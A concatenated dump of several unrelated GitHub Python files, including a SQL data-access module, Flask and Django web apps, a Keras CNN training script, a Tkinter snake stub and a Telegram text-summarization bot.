real table statements (from temp table).\n # skip any record that has an active duplicate\n sql_statements.append('''\ninsert into competitive_companies (home_company_id, away_company_id, competition_strength, created_at, updated_at, assumed_start_date, assumed_end_date)\nselect temp_cc.home_company_id, temp_cc.away_company_id, temp_cc.competition_strength, temp_cc.created_at, temp_cc.updated_at, temp_cc.assumed_start_date, temp_cc.assumed_end_date\nfrom #competitive_companies temp_cc\nleft join competitive_companies cc on cc.home_company_id = temp_cc.home_company_id and cc.away_company_id = temp_cc.away_company_id\n and cc.competition_strength = temp_cc.competition_strength and cc.assumed_end_date is null\nwhere cc.home_company_id is null''')\n\n # add drop temp table statement\n sql_statements.append(\"drop table #competitive_companies\")\n\n # join statements and execute\n big_statement = '; '.join(sql_statements)\n sql_execute(big_statement, database_name = database_name)\n\n\ndef select_all_open_competitive_companies_ids_for_company(company_id):\n statement = '''\n SELECT\n away_company_id\n FROM competitive_companies\n WHERE home_company_id = %d AND assumed_end_date is null''' % company_id\n\n rows = sql_execute(statement)\n competitive_company_ids = [row.away_company_id for row in rows]\n return competitive_company_ids\n\n\ndef close_old_company_competitors(away_company_ids, home_company_id, assumed_end_date):\n for competitor_id in away_company_ids:\n statement = \"UPDATE competitive_companies SET assumed_end_date = ? WHERE home_company_id = ? AND away_company_id = ?\"\n parameters = [assumed_end_date, home_company_id, competitor_id]\n sql_execute_with_parameters(parameters, statement)","repo_name":"erezrubinstein/aa","sub_path":"gp/data_access/company_competition_handler.py","file_name":"company_competition_handler.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27263331753","text":"import sys\n\nseqLen = int(sys.stdin.readline())\nseqList = list(map(int, sys.stdin.readline().split()))\n\ndef countLen(seqList):\n # 증가, 감소 각각 저장하는 리스트를 따로 만든다.\n # 증가하는 수열의 길이 저장하는 리스트\n incCnt = [1]\n # 감소하는 수열의 길이 저장하는 리스트\n decCnt = [1]\n for i in range(1, len(seqList)):\n # 이전 것이 지금 것보다 작기만 하면,\n # 증가하는 수열의 길이만 늘리고, 감소는 1로 초기화\n if seqList[i]seqList[i-1]:\n incCnt.append(incCnt[-1]+1)\n decCnt.append(1)\n # 서로 같으면 둘다 늘리기\n else:\n decCnt.append(decCnt[-1]+1)\n incCnt.append(incCnt[-1]+1)\n return max(max(incCnt), max(decCnt))\n\nprint(countLen(seqList))","repo_name":"elice-02-study-01-algorithm/python","sub_path":"CJ_Kim/season1/baekjoon/04/2491_수열.py","file_name":"2491_수열.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7399118284","text":"from flask import Flask, request, render_template\r\nfrom flask import Response\r\nimport os\r\nfrom flask_cors import CORS, cross_origin\r\n\r\nfrom prediction_Validation_Insertion import PredictionValidation\r\nfrom trainingModel import TrainModel\r\nfrom training_Validation_Insertion import TrainValidation\r\n# import flask_monitoringdashboard as dashboard\r\nfrom predictFromModel import Prediction\r\n\r\n\r\nos.putenv('LANG', 'en_US.UTF-8')\r\nos.putenv('LC_ALL', 'en_US.UTF-8')\r\n\r\napp = Flask(__name__)\r\n# dashboard.bind(app)\r\nCORS(app)\r\n\r\n\r\n@app.route(\"/\", methods=['GET'])\r\n@cross_origin()\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route(\"/predict\", methods=['POST'])\r\n@cross_origin()\r\ndef predictRouteClient():\r\n try:\r\n if request.json is not None:\r\n path = request.json['filepath']\r\n # Object Initialization\r\n predict_val = PredictionValidation(path)\r\n # Calling the prediction_validation function\r\n predict_val.prediction_validation()\r\n # Object Initialization\r\n pred = Prediction(path)\r\n # Predicting for dataset present in database\r\n path = pred.predictionFromModel()\r\n return Response(\"Prediction File created at %s!!!\" % path)\r\n elif request.form is not None:\r\n path = request.form['filepath']\r\n # Object Initialization\r\n predict_val = PredictionValidation(path)\r\n # Calling the prediction_validation function\r\n predict_val.prediction_validation()\r\n # Object Initialization\r\n pred = Prediction(path)\r\n # Predicting for dataset present in database\r\n path = pred.predictionFromModel()\r\n return Response(\"Prediction File created at %s!!!\" % path)\r\n\r\n except ValueError:\r\n print(\"Error Occurred! \" + str(ValueError))\r\n return Response(\"Error Occurred! %s\" % str(ValueError))\r\n except KeyError:\r\n print(\"Error Occurred! \" + str(KeyError))\r\n return Response(\"Error Occurred! %s\" % KeyError)\r\n except Exception as e:\r\n print(\"Error Occurred! \" + str(e))\r\n return Response(\"Error Occurred! %s\" % e)\r\n\r\n\r\n@app.route(\"/train\", methods=['POST'])\r\n@cross_origin()\r\ndef trainRouteClient():\r\n\r\n try:\r\n if request.json['folderPath'] is not None:\r\n path = request.json['folderPath']\r\n # Object Initialization\r\n train_valObj = TrainValidation(path)\r\n # Calling the training_validation function\r\n train_valObj.train_validation()\r\n # Object Initialization\r\n trainModelObj = TrainModel()\r\n # Training the Model for the files in the table\r\n trainModelObj.trainingModel()\r\n\r\n except ValueError:\r\n\r\n return Response(\"Error Occurred! %s\" % ValueError)\r\n\r\n except KeyError:\r\n\r\n return Response(\"Error Occurred! %s\" % KeyError)\r\n\r\n except Exception as e:\r\n\r\n return Response(\"Error Occurred! %s\" % e)\r\n return Response(\"Training successful!!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"sandeepyadav10011995/Thyroid-Detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13477130179","text":"import os, sys\n\nimport datetime\n\nfrom django.http import HttpResponsePermanentRedirect, HttpResponseForbidden\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom django.views.generic.simple import *\nfrom django.views.generic.list_detail import *\nfrom django.views.generic.create_update import *\n\nfrom webapps.generic.views import *\nfrom webapps.generic.models import *\nfrom webapps.generic.errors import *\nfrom webapps.sbinfo.models import *\n\nVALID_FACTORS = [\n 'student'\n]\n\nADMIN_FACTORS = [\n 'appointments'\n]\n\ndef index(request):\n authenticate(request, VALID_FACTORS)\n \n return render_to_response('sbinfo/index.phtml',context_instance=RequestContext(request))\n\ndef sbinfo_submit(request):\n authenticate(request, VALID_FACTORS)\n \n if request.method == 'POST':\n if sbinfoentry_id == '':\n entry = SBInfoEntry()\n else:\n entry = SBInfoEntry.objects.get(id = sbinfoentry_id)\n \n post = request.POST\n \n entry.contact = request.user\n entry.title = post['title']\n entry.message = post['message']\n entry.save()\n\n template_args = {\n 'user' : request.user,\n 'entry' : entry,\n }\n \n return render_to_response('sbinfo/submit.phtml',template_args,context_instance=RequestContext(request))\n\n else:\n entry = SBInfoEntry()\n template_args = {\n 'user' : request.user,\n 'entry' : entry,\n }\n\n return render_to_response('sbinfo/submit.phtml',template_args,context_instance=RequestContext(request))\n\ndef sbinfo_list(request):\n authenticate(request, VALID_FACTORS)\n","repo_name":"ReedSIN/webapps","sub_path":"sbinfo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27480622015","text":"from django import forms\nfrom django.forms.models import BaseModelFormSet\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import ValidationError\n\nfrom .models import (\n Officials, Club, PlayerInfo, JerseyPicture, ProfilePicture,\n AgeProof, AddressProof, Invitations, ClubDetails, Grounds\n)\n\nfrom myapp.widgets import ImageInput\n\n\nclass SignUpFormClub(UserCreationForm):\n\n club_name = forms.CharField(\n label='Name of the Club', max_length=100, required=True)\n\n address = forms.CharField(\n label='Address of the Club', max_length=200, required=True,\n widget=forms.Textarea)\n\n contact_number = forms.CharField(\n label='Contact number', max_length=10, min_length=10, required=True)\n\n class Meta:\n model = get_user_model()\n fields = ('username', 'club_name', 'address', 'email',\n 'contact_number', 'password1', 'password2')\n\n\nclass SignUpFormPersonal(UserCreationForm):\n class Meta:\n model = get_user_model()\n fields = ('username', 'email', 'password1', 'password2')\n\n\nclass dpFormSet(BaseModelFormSet):\n def __init__(self, *args, **kwargs):\n clubid = kwargs.pop('clubid', None)\n super().__init__(*args, **kwargs)\n if clubid is None:\n qs = ProfilePicture.objects.filter(checked=False)\n else:\n qs = ProfilePicture.objects.filter(\n user__club__pk=clubid).filter(checked=False)\n\n qs1 = qs.order_by('pk')\n self.queryset = qs1[:10]\n\n\nclass dpUploadForm(forms.ModelForm):\n class Meta:\n model = ProfilePicture\n fields = ['image', ]\n widgets = {\n 'image': ImageInput()\n }\n\n\nclass dpEditForm(forms.ModelForm):\n xp1 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n xp2 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n yp1 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n yp2 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n\n class Meta:\n model = ProfilePicture\n fields = ['checked', ]\n widgets = {\n 'checked': forms.HiddenInput(),\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.instance.image:\n xp1, yp1, xp2, yp2 = self.instance.get_cropbox_frac()\n self.fields['xp1'].initial = xp1\n self.fields['xp2'].initial = xp2\n self.fields['yp1'].initial = yp1\n self.fields['yp2'].initial = yp2\n\n def save(self, commit=True):\n obj = super().save(commit=False)\n data = self.cleaned_data\n xp1, yp1, xp2, yp2 = self.instance.get_cropbox_frac()\n xp1, yp1 = data.get('xp1', xp1), data.get('yp1', yp1)\n xp2, yp2 = data.get('xp2', xp2), data.get('yp2', yp2)\n if xp1 >= xp2 or yp1 >= yp2:\n raise ValidationError(\"Incorrect Cropbox\")\n obj.set_cropbox_frac(xp1, yp1, xp2, yp2)\n if commit:\n obj.save()\n return obj\n\n\nclass ProfilePictureForm(forms.ModelForm):\n class Meta:\n model = ProfilePicture\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n # 'image': ImageWidget(),\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass AgeProofForm(forms.ModelForm):\n class Meta:\n model = AgeProof\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n # 'image': ImageWidget(),\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass AddressProofForm(forms.ModelForm):\n class Meta:\n model = AddressProof\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n # 'image': ImageWidget(),\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass JerseyForm(forms.ModelForm):\n class Meta:\n model = JerseyPicture\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass OfficialsEditForm(forms.ModelForm):\n class Meta:\n model = Officials\n fields = ['first_name', 'last_name',\n 'date_of_birth', 'address',\n 'phone_number']\n\n\nclass OfficialsCreationForm(forms.ModelForm):\n image = forms.ImageField(max_length=255, label='Photo')\n x1 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n x2 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n y1 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n y2 = forms.IntegerField(min_value=0, widget=forms.HiddenInput, initial=0)\n\n class Meta:\n model = Officials\n fields = ['first_name', 'last_name', 'role',\n 'date_of_birth', 'address', 'phone_number',\n 'occupation']\n\n widgets = {\n 'role': forms.HiddenInput(),\n }\n\n\nclass PlayerCreationForm(OfficialsCreationForm):\n height = forms.IntegerField(\n required=True, min_value=100, max_value=200,\n help_text=\"Height in Centimeters\")\n weight = forms.IntegerField(\n required=True, help_text=\"Weight in Kilograms\")\n prefered_foot = forms.ChoiceField(\n choices=[('', '---'), ]+PlayerInfo.foot_choices, required=True)\n favorite_position = forms.ChoiceField(\n choices=[('', '---'), ]+PlayerInfo.position_choices, required=True)\n address_proof = forms.ImageField(help_text=\"Document for address proof\")\n age_proof = forms.ImageField(help_text=\"Documents for age proof\")\n\n\nclass LinkPlayerForm(forms.ModelForm):\n class Meta:\n model = Invitations\n fields = ['player', 'profile']\n\n widgets = {\n 'profile': forms.HiddenInput(),\n }\n\n def __init__(self, club, *args, **kwargs):\n super().__init__(*args, **kwargs)\n Users = get_user_model()\n self.fields['player'].queryset = Users.objects.filter(\n Official__isnull=True).filter(\n club__isnull=True).filter(\n is_staff=False).filter(\n email_verified=True).exclude(\n invitations__club=club)\n\n\nclass abbrForm(forms.ModelForm):\n class Meta:\n model = ClubDetails\n fields = ['abbr', ]\n\n\nclass clubDetailsForm(forms.ModelForm):\n\n class Meta:\n model = ClubDetails\n fields = ['address', 'contact_number', 'date_of_formation']\n","repo_name":"prajeeshag/VFF","sub_path":"registration/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13070622888","text":"#!/bin/env python\nfrom Tkinter import *\n\nclass Snake(Tk):\n def __init__(self):\n WIDTH=300\n HEIGHT=300\n \n Tk.__init__(self)\n\n self.title(\"Snake\")\n\n self.canvas = Canvas(self, width=WIDTH, height=HEIGHT, bg=\"white\")\n self.canvas.grid(columnspan=3)\n self.canvas.focus_set()\n self.canvas.bind(\"\", self.create)\n self.canvas.bind(\"\", self.create)\n\n newGame = Button(self, text=\"New Game\", command=self.new_game)\n newGame.grid(row=1, column=0, sticky=E)\n\n self.score_label = Label(self)\n self.score_label.grid(row=1, column=1)\n\n self.score_label = Label(self)\n self.score_label.grid(row=1, column=2)\n\n self.new_game()\n self.redraw()\n\n def new_game(self):\n self.lives = 3\n self.score = 0\n self.mainloop()\n\n def redraw(self):\n self.score_label.text=\"00000\"\n\n def create(self, origin):\n pass\n\nif __name__ == '__main__':\n Snake()\n","repo_name":"tkentrich/Python","sub_path":"Tkinter/SnakeGame.py","file_name":"SnakeGame.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23790775918","text":"#coding:utf-8\r\n \r\nimport random \r\nimport numpy as np\r\nimport math\r\nimport h5py\r\nimport time\r\nimport os\r\nfrom six.moves import range \r\nimport pickle\r\nimport sys\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.callbacks import Callback\r\nfrom keras.preprocessing.sequence import * \r\nfrom keras.models import Sequential \r\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten \r\nfrom keras.layers.advanced_activations import PReLU \r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.optimizers import SGD, Adadelta, Adagrad \r\nfrom keras.utils import np_utils, generic_utils \r\nimport matplotlib.pyplot as plt \r\nfrom keras import backend\r\nfrom keras.models import load_model\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\nclass LossHistory(Callback):\r\n def on_train_begin(self, logs={}):\r\n self.losses = {'batch':[], 'epoch':[]}\r\n self.accuracy = {'batch':[], 'epoch':[]}\r\n self.val_loss = {'batch':[], 'epoch':[]}\r\n self.val_acc = {'batch':[], 'epoch':[]}\r\n\r\n def on_batch_end(self, batch, logs={}):\r\n self.losses['batch'].append(logs.get('loss'))\r\n self.accuracy['batch'].append(logs.get('acc'))\r\n self.val_loss['batch'].append(logs.get('val_loss'))\r\n self.val_acc['batch'].append(logs.get('val_acc'))\r\n\r\n def on_epoch_end(self, batch, logs={}):\r\n self.losses['epoch'].append(logs.get('loss'))\r\n self.accuracy['epoch'].append(logs.get('acc'))\r\n self.val_loss['epoch'].append(logs.get('val_loss'))\r\n self.val_acc['epoch'].append(logs.get('val_acc'))\r\n\r\n def loss_plot(self, loss_type,fig_name):\r\n iters = range(len(self.losses[loss_type]))\r\n plt.figure()\r\n plt.plot(iters, self.accuracy[loss_type], 'r', label='train acc')\r\n plt.plot(iters, self.losses[loss_type], 'g', label='train loss')\r\n if loss_type == 'epoch':\r\n plt.plot(iters, self.val_acc[loss_type], 'b', label='val acc')\r\n plt.plot(iters, self.val_loss[loss_type], 'k', label='val loss')\r\n plt.grid(True)\r\n plt.xlabel(loss_type)\r\n plt.ylabel('acc-loss')\r\n plt.legend(loc=\"upper right\")\r\n plt.savefig(fig_name+'.jpg')\r\n plt.close()\r\n\r\ndef make_noise(train_label,precent,seed_ini):\r\n noise_label= train_label.copy()\r\n total = np.shape(train_label)[0]\r\n noise_lines = random.sample(range(seed_ini,total),int(total*float(precent)))\r\n for i in noise_lines:\r\n label_list = [0,1,2]\r\n label_list.remove(train_label[i])\r\n noise_label[i] = random.choice(label_list)\r\n return noise_label\r\n\r\n\r\ndef add_layers(model):\r\n\r\n model.add(Conv2D(8, (3, 5), padding=\"valid\", kernel_initializer=\"uniform\", weights=None, input_shape=(100,200,3)) )\r\n model.add(Activation('relu'))\r\n\r\n model.add(Conv2D(8,(3,5),padding=\"valid\")) \r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 4)))\r\n model.add(Dropout(0.2))\r\n \r\n model.add(Conv2D(16,(3,3), padding=\"valid\"))\r\n model.add(Activation('relu')) \r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.2))\r\n\r\n model.add(Flatten()) \r\n model.add(Dense(64, kernel_initializer=\"normal\"))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Dense(3, kernel_initializer=\"normal\")) \r\n model.add(Activation('softmax')) \r\n model.summary() \r\n\r\n list_lr=float(sys.argv[5])\r\n sgd = SGD(lr=list_lr, decay=0.00001, momentum=0.1, nesterov=False)\r\n model.compile(loss='categorical_crossentropy', metrics=['accuracy'],optimizer=sgd)\r\n return model\r\n\r\ndef train(model,X_train,train_label,list_batch,list_epoch, threshod):\r\n model = add_layers(model)\r\n history = LossHistory()\r\n seed = X_train[:200]\r\n seed_l = train_label[:200]\r\n rest = X_train\r\n rest_l = train_label\r\n exists = [0 for i in X_train]\r\n for i in range(200):\r\n exists[i]=1\r\n\r\n model.fit(seed,seed_l, batch_size=list_batch, epochs=list_epoch,shuffle=False,verbose=2,validation_split=0.15,callbacks=[history])\r\n stop=0\r\n while stop==0:\r\n rest_res = model.predict(rest)\r\n candidates = [max(i) for i in rest_res]\r\n print('||||||||||||||||||||||||||||||||||||||||||||')\r\n print(max(candidates))\r\n print(min(candidates))\r\n candidates_l = list(rest_res.argmax(axis=1))\r\n stop_tmp=0\r\n for index in range(len(candidates)):\r\n if candidates_l[index] == list(rest_l[index]).index(1) and candidates[index] > threshod and exists[index]==0 : \r\n tmp = np.empty([1,100,200,3])\r\n tmp[0] = rest[index]\r\n seed = np.concatenate((seed, tmp))\r\n tmp = np.empty([1,3])\r\n tmp[0] = rest_l[index] \r\n seed_l = np.concatenate((seed_l,tmp))\r\n exists[index]=1 \r\n stop_tmp=1\r\n if stop_tmp==0:\r\n stop=1\r\n else:\r\n model.fit(seed,seed_l, batch_size=list_batch, epochs=list_epoch,shuffle=False,verbose=2,validation_split=0.15)\r\n return model,history \r\n\r\ndef test(result,test_label):\r\n\r\n j_0_0 = 0\r\n j_0_1 = 0\r\n j_0_2 = 0\r\n j_1_0 = 0\r\n j_1_1 = 0\r\n j_1_2 = 0\r\n j_2_0 = 0\r\n j_2_1 = 0\r\n j_2_2 = 0\r\n\r\n for i,pred in enumerate(list(result)):\r\n res = list(pred)\r\n label = test_label[i]\r\n label_pred = res.index(max(res))\r\n\r\n if label==0 and label_pred == 0:\r\n j_0_0+=1\r\n elif label==0 and label_pred == 1:\r\n j_0_1+=1\r\n elif label==0 and label_pred == 2:\r\n j_0_2+=1\r\n elif label==1 and label_pred == 0:\r\n j_1_0+=1\r\n elif label==1 and label_pred == 1:\r\n j_1_1+=1\r\n elif label==1 and label_pred == 2:\r\n j_1_2+=1\r\n elif label==2 and label_pred == 0:\r\n j_2_0+=1\r\n elif label==2 and label_pred == 1:\r\n j_2_1+=1\r\n elif label==2 and label_pred == 2:\r\n j_2_2+=1\r\n\r\n print(\"j_0_0 = \" + str(j_0_0))\r\n print(\"j_0_1 = \" + str(j_0_1))\r\n print(\"j_0_2 = \" + str(j_0_2))\r\n print(\"j_1_0 = \" + str(j_1_0))\r\n print(\"j_1_1 = \" + str(j_1_1))\r\n print(\"j_1_2 = \" + str(j_1_2))\r\n print(\"j_2_0 = \" + str(j_2_0))\r\n print(\"j_2_1 = \" + str(j_2_1))\r\n print(\"j_2_2 = \" + str(j_2_2))\r\n\r\n\r\n\r\ndef main():\r\n\r\n # loading data-----------------------------------------------------------------------------------\r\n\r\n t0=time.time()\r\n X_train= pickle.load( open(sys.argv[1], 'rb'))\r\n #X_train_right = pickle.load( open(sys.argv[2], 'rb'))\r\n train_label = pickle.load( open(sys.argv[2], 'rb'))\r\n noise = sys.argv[3]\r\n noise_label = make_noise(train_label,noise,200)\r\n list_lr=float(sys.argv[4])\r\n list_batch=int(sys.argv[5])\r\n list_epoch=int(sys.argv[6])\r\n X_test = pickle.load( open(sys.argv[7], 'rb'))\r\n #X_test_right = pickle.load( open(sys.argv[9], 'rb'))\r\n test_label = pickle.load( open(sys.argv[8], 'rb'))\r\n\r\n model_name='cnn_cover'+'_'+sys.argv[3]+'_'+str(list_lr)+'_'+str(list_batch)+'_'+str(list_epoch)\r\n #right_model_name='cnn_right'+'_'+sys.argv[4]+'_'+str(list_lr)+'_'+str(list_batch)+'_'+str(list_epoch)\r\n t1=time.time()\r\n print (\"loading data uses time: \"+str(t1-t0))\r\n\r\n noise_label = np_utils.to_categorical(noise_label,3) \r\n print('Build model...')\r\n model = Sequential() \r\n threshod = 0.8\r\n model,history = train(model,X_train,noise_label,list_batch,list_epoch, threshod)\r\n model.save(''+ model_name+'.h5')\r\n \r\n result = model.predict(X_test)\r\n test(result,test_label)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"BRF123/Cnngeno","sub_path":"TRAIN_TEST_CNN/3.train_cnn_boot.py","file_name":"3.train_cnn_boot.py","file_ext":"py","file_size_in_byte":7651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15988998379","text":"\"\"\"Sequence V\"\"\"\n\n\ndef seq5(number):\n \"seq5 with 7\"\n countfor7 = 0\n for counting in range(number, 0, -1):\n print(counting, end=\" \")\n countfor7 += 1\n if countfor7 == 7:\n print(\"\")\n countfor7 = 0\n\n\nseq5(int(input()))\n","repo_name":"ExxiDauS/PSCP-Y1S1","sub_path":"Week 4/Sequence V.py","file_name":"Sequence V.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73377022913","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom data import *\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/internships/')\r\ndef internships(program_type):\r\n programs_list = read_programs_by_program_type(program_type)\r\n return render_template(\"internship.html\", program_type=program_type, programs=programs_list)\r\n\r\n@app.route('/internships/')\r\ndef program(program_id):\r\n program = read_programs_by_program_type(program_id)\r\n return render_template(\"program.html\",program=program)\r\n\r\n\r\n@app.route('/register')\r\ndef register():\r\n return render_template('register.html')\r\n\r\n@app.route('/processed', methods=['post'])\r\ndef processing():\r\n program_data = {\r\n \"program_type\": request.form['program_type'],\r\n \"program_name\": request.form['program_name'],\r\n \"salary\": request.form['program_salary'],\r\n \"duration\": request.form['program_duration'],\r\n \"description\": request.form['program_desc'],\r\n \"url\": request.form['program_url']\r\n }\r\n insert_program(program_data)\r\n return redirect(url_for('internships', program_type=request.form['program_type']))\r\n\r\n\r\n@app.route('/modify', methods=['post'])\r\ndef modify():\r\n # 1. identify whether user clicked edit or delete\r\n # if edit, then do this:\r\n if request.form[\"modify\"] == \"edit\":\r\n # retrieve record using id\r\n program_id = request.form[\"program_id\"]\r\n program = read_programs_by_program_type(program_id)\r\n # update record with new data\r\n return render_template('update.html', program=program)\r\n # if delete, then do this\r\n elif request.form[\"modify\"] == \"delete\":\r\n # retrieve record using id\r\n program_id = request.form[\"program_id\"]\r\n program = read_programs_by_program_type(program_id)\r\n # delete the record\r\n delete_program(program_id)\r\n # redirect user to program list by program type\r\n return redirect(url_for(\"internships\", program_type=program[\"program_type\"]))\r\n\r\n@app.route('/update', methods=['post'])\r\ndef update():\r\n program_data = {\r\n \"program_id\" : request.form[\"program_id\"],\r\n \"program_type\": request.form['program_type'],\r\n \"program_name\": request.form['program_name'],\r\n \"salary\": request.form['program_salary'],\r\n \"duration\": request.form['program_duration'],\r\n \"description\": request.form['program_desc'],\r\n \"url\": request.form['program_url']\r\n }\r\n update_program(program_data)\r\n return redirect(url_for('program',program_id = request.form['program_id']))\r\n\r\ndef delete_program(program_id):\r\n conn, cur = connect_to_db(db_path)\r\n query = \"DELETE FROM programs WHERE id = ?\"\r\n values = (program_id,)\r\n cur.execute(query, values)\r\n conn.commit()\r\n conn.close()\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"jtfidelis/choose-an-internship","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28743329531","text":"import asyncio\nimport logging\nimport nltk\nfrom telegram import Update\nfrom telegram.ext import ApplicationBuilder, ContextTypes, CommandHandler, filters, MessageHandler\n\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\nfrom transformers import pipeline\n\nfrom goose3 import Goose\nimport torch\n\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom time import perf_counter\n\n\nsummarizer = \"\"\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.DEBUG\n)\n\nlogging.getLogger('apscheduler').setLevel(logging.WARNING)\nlogging.getLogger('telegram._bot').setLevel(logging.WARNING)\nlogging.getLogger('httpx._client').setLevel(logging.WARNING)\nlogging.getLogger('telegram.ext._application').setLevel(logging.WARNING)\nlogging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\nasync def start(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"I'm a Summary bot, Send me text for summarization.\")\n\nasync def createSummary(update: Update, context: ContextTypes.DEFAULT_TYPE):\n inputText=update.message.text \n logging.debug( f\"Received Mesage from {update.effective_chat.id}\\n\\t {inputText}\")\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"Processing...\")\n summary = await getSummary(inputText)\n \n logging.debug( f\"Summary\\n\\t{summary}\")\n await context.bot.send_message(chat_id=update.effective_chat.id, text=summary, device = 1)\n\nasync def getSummary(inputText):\n inputTextLength = len(inputText)\n summaryMaxLength = min(int(inputTextLength/2), 300)\n summaryMinLenght= min(int(summaryMaxLength/2), 200)\n\n t1_start = perf_counter()\n\n summaryObject = summarizer(inputText, max_length=summaryMaxLength, min_length=summaryMinLenght, do_sample=False)\n t1_stop = perf_counter()\n logging.info(f\"Duration: {t1_stop - t1_start}\")\n\n summary = summaryObject[0]['summary_text']\n return summary\n\nasync def parseUrl(update: Update, context: ContextTypes.DEFAULT_TYPE):\n asyncio.create_task(\n processParseUrl(update, context))\n\nasync def processParseUrl(update: Update, context: ContextTypes.DEFAULT_TYPE):\n url = update.message.text.removeprefix('/url ')\n logging.debug( f\"Received URL from {update.effective_chat.id}\\n\\t {url}\")\n g = Goose()\n article = g.extract(url=url)\n await context.bot.send_message(chat_id=update.effective_chat.id, text=f\"Processing '{article.title}'\")\n\n article = article.cleaned_text\n sentences = sent_tokenize(article)\n \n batches = []\n currentBatchSize = 0;\n batch = ''\n for sentence in sentences:\n if(len(sentence) >= 1024):\n continue\n if(currentBatchSize + len(sentence) + 1 < 1024):\n batch = batch + ' ' + sentence\n currentBatchSize += len(sentence) + 1\n else:\n batches.append(batch)\n batch = sentence\n currentBatchSize = len(batch)\n\n summaries = []\n for batch in batches:\n summary = await getSummary(batch)\n summaries.append(summary)\n \n for summary in summaries:\n await context.bot.send_message(chat_id=update.effective_chat.id, text=summary)\n\n await context.bot.send_message(chat_id=update.effective_chat.id, text=\"Done.\")\n\nif __name__ == '__main__':\n logging.debug( f\"Models Initialization...\")\n #tokenizer = AutoTokenizer.from_pretrained(\"facebook/bart-large-cnn\")\n #model = AutoModelForSeq2SeqLM.from_pretrained(\"facebook/bart-large-cnn\")\n \n summarizer = pipeline(\"summarization\", model=\"facebook/bart-large-cnn\", device=torch.cuda.current_device())\n \n logging.debug( f\"Initialized.\")\n \n application = ApplicationBuilder().token('< Telegram bot tocken >').build()\n start_handler = CommandHandler('start', start)\n application.add_handler(start_handler)\n\n # parseUrl_handler = CommandHandler('url', parseUrl)\n # application.add_handler(parseUrl_handler)\n\n echo_handler = MessageHandler(filters.TEXT & (~filters.COMMAND), parseUrl)\n application.add_handler(echo_handler)\n\n 